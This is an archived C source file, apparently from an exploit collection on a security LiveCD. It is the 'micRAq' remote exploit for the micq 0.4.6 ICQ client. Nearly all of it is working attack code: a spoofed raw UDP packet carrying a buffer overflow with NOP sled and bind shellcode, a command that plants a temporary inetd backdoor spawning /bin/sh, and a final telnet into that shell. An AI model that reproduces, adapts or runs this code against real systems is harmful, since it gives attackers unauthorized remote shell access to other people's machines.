Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / icq / micq-exp.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 9KB | 285 lines

/* [ micRAq ] - by tHE rECIdjVO <recidjvo@pkcrew.org> Packet Knights - http://www.pkcrew.org/ - version affected: micq-0.4.6 - maybe others (http://freshmeat.net/) - coded for: ix86/Linux-2.2.16 - gcc version: egcs-2.91.66 usage: ./micRAq <client_ip> <client_port> <server_ip> <hex_session> [address] Please read PkC Advisory #003 first. Catch parameters with tcpdump-3.6.1 (http://www.tcpdump.org/) Last 4 shown bytes are <hex_session> # tcpdump -i <interface> -s 49 -tnx udp src port 4000 Dedicated to: Francesca (I'll never forget you :*) Tnx: |CyRaX|, asynchro, vecna, Nail, [ndk], MatOfPeng */ #define DEFAULT_BUFFER_ADDRESS 0xbfffeea0 #define OFFSET 991 #define ICQ_SERVER_PORT 4000 #define BACK_PORT "10105" #define NOP '\x90' #define COMMAND "echo -e \"" BACK_PORT " stream tcp nowait `whoami` /bin/sh sh -i\">/tmp/.micRAqbd;/usr/sbin/inetd /tmp/.micRAqbd;sleep 1;rm /tmp/.micRAqbd;exit;" #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/udp.h> int main(int argc, char *argv[]); unsigned short in_cksum (u_short *addr, int len); // Ripped. Who didn't it? ;) void build_buffer(char *buffer, unsigned long *buff_addr); int go(char *ip); // bind shellcode by [multiple] char shellcode[]= "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; typedef struct { unsigned char uin[4]; unsigned char year[2]; unsigned char month; unsigned char day; unsigned char hour; unsigned char minute; unsigned char type[2]; unsigned char len[2]; } RECV_MESSAGE, *RECV_MESSAGE_PTR; struct SRV_ICQ_pak { unsigned char ver[2]; unsigned char zero; unsigned char session[4]; unsigned char cmd[2]; unsigned char seq[2]; unsigned char seq2[2]; unsigned char UIN[4]; unsigned char check[4]; }; struct srv_net_icq_pak { struct SRV_ICQ_pak head; unsigned char data[1024]; }; unsigned short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } void build_buffer(char *buffer, unsigned long *buff_addr) { // Fill the data headers memset(buffer, '\b', 1024); memset(buffer, '\0', 7); buffer[4] = '\x04'; buffer[8] = '\xFE'; // Fill the buffer memset(buffer + 9, NOP, strtoul(buffer, NULL, 10) + OFFSET - strlen(shellcode) - 9); memcpy(buffer + OFFSET - strlen(shellcode), shellcode, strlen(shellcode)); memcpy(buffer + OFFSET, buff_addr, 4); buffer[1023] = '\0'; return; } int go(char *ip) { int sock, conn; struct sockaddr_in saddr; // Create socket if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); return(-1); } saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = inet_addr(ip); saddr.sin_port = htons(3879); // Connect to 3879 and issue COMMAND if((conn = connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))) < 0) { perror("connect()"); return(-1); } send(sock, COMMAND, sizeof(COMMAND), 0); // All done here close(sock); return(0); } int main(int argc, char *argv[]) { int sock, i, hincl = 1; unsigned long buff_addr = DEFAULT_BUFFER_ADDRESS; struct sockaddr_in saddr; struct ip *pip; struct udphdr *pudp; char *packet, conv[3]; struct srv_net_icq_pak *pak; RECV_MESSAGE_PTR r_data; printf("\n\t[ [ micRAq ] - by tHE rECIdjVO <recidjvo@pkcrew.org> ]\n\t\tPacket Knights - http://www.pkcrew.org/\n\n"); if((argc != 5) && (argc != 6)) { printf("usage: %s <client_ip> <client_port> <server_ip> <hex_session> [buffer]\n\n", argv[0]); exit(-1); } if(strlen(argv[4]) != 8) { printf("Error: <session> must be 8 digits exadecimal number.\n\n"); exit(-1); } if(argc == 6) { buff_addr = strtoul(argv[5], NULL, 16); } printf("Using buffer address: 0x%x\n\n", buff_addr); // Create the RAW socket if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket()"); exit(-1); } if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl)) < 0) { perror("setsockopt()"); close(sock); exit(-1); } // Set pointers packet = malloc(sizeof(struct ip) + sizeof(struct udphdr) + 1024); pip = (struct ip *)packet; pudp = (struct udphdr *)(packet + sizeof(struct ip)); pak = (struct srv_net_icq_pak *)(packet + sizeof(struct ip) + sizeof(struct udphdr)); // Clear packet memset(packet, 0, sizeof(struct ip) + sizeof(struct udphdr) + 1024); // Fill the packet headers saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = inet_addr(argv[1]); pip->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + 1024); pip->ip_hl = 5; pip->ip_v = 4; pip->ip_ttl = 255; pip->ip_tos = 0; pip->ip_off = 0; pip->ip_id = htons(getpid()); pip->ip_p = IPPROTO_UDP; pip->ip_src.s_addr = inet_addr(argv[3]); pip->ip_dst.s_addr = inet_addr(argv[1]); pip->ip_sum = in_cksum((u_short*)pip, sizeof(struct ip)); pudp->source = htons(ICQ_SERVER_PORT); pudp->dest = htons(atoi(argv[2])); pudp->len = htons(sizeof(struct udphdr) + 1024); pudp->check = 0; // Fill the message headers pak->head.ver[0] = 5; pak->head.ver[1] = 0; pak->head.zero = 0; for(i = 0; i < 8; i += 2) { conv[0] = argv[4][i]; conv[1] = argv[4][i + 1]; conv[2] = '\0'; pak->head.session[i / 2] = strtol(conv, NULL, 16); } pak->head.cmd[0] = 4; pak->head.cmd[1] = 1; pak->head.seq[0] = 0; pak->head.seq[1] = 0; pak->head.seq2[0] = 0; pak->head.seq2[1] = 0; pak->head.UIN[0] = 0; pak->head.UIN[1] = 0; pak->head.UIN[2] = 0; pak->head.UIN[3] = 0; pak->head.check[0] = 0; pak->head.check[1] = 0; pak->head.check[2] = 0; pak->head.check[3] = 0; // Fill the buffer build_buffer(pak->data, &buff_addr); // Send the packet if(sendto(sock, packet, sizeof(struct ip) + sizeof(struct udphdr) + 1024, 0, (struct sockaddr *)&saddr, sizeof(struct sockaddr_in)) < 0) { perror("sendto()"); close(sock); exit(-1); } // Clear the socket close(sock); // Send command to execute inetd backdoor sleep(1); // First connect if(go(argv[1]) < 0) { printf("Unable to connect :\\\n"); exit(-1); } // Wait a bit to let the command to be issued sleep(1); printf("\t\"To be"); fflush(stdout); sleep(2); printf(", or not to be.\n"); sleep(1); printf("\t This is the question.\"\n"); sleep(1); printf("\t\t\t(William Shakespeare)\n\n"); // Connect to remote host execl("/usr/bin/telnet", "telnet", argv[1], BACK_PORT, NULL); // Never been here exit(-1); } /* micRAq.c - EOF */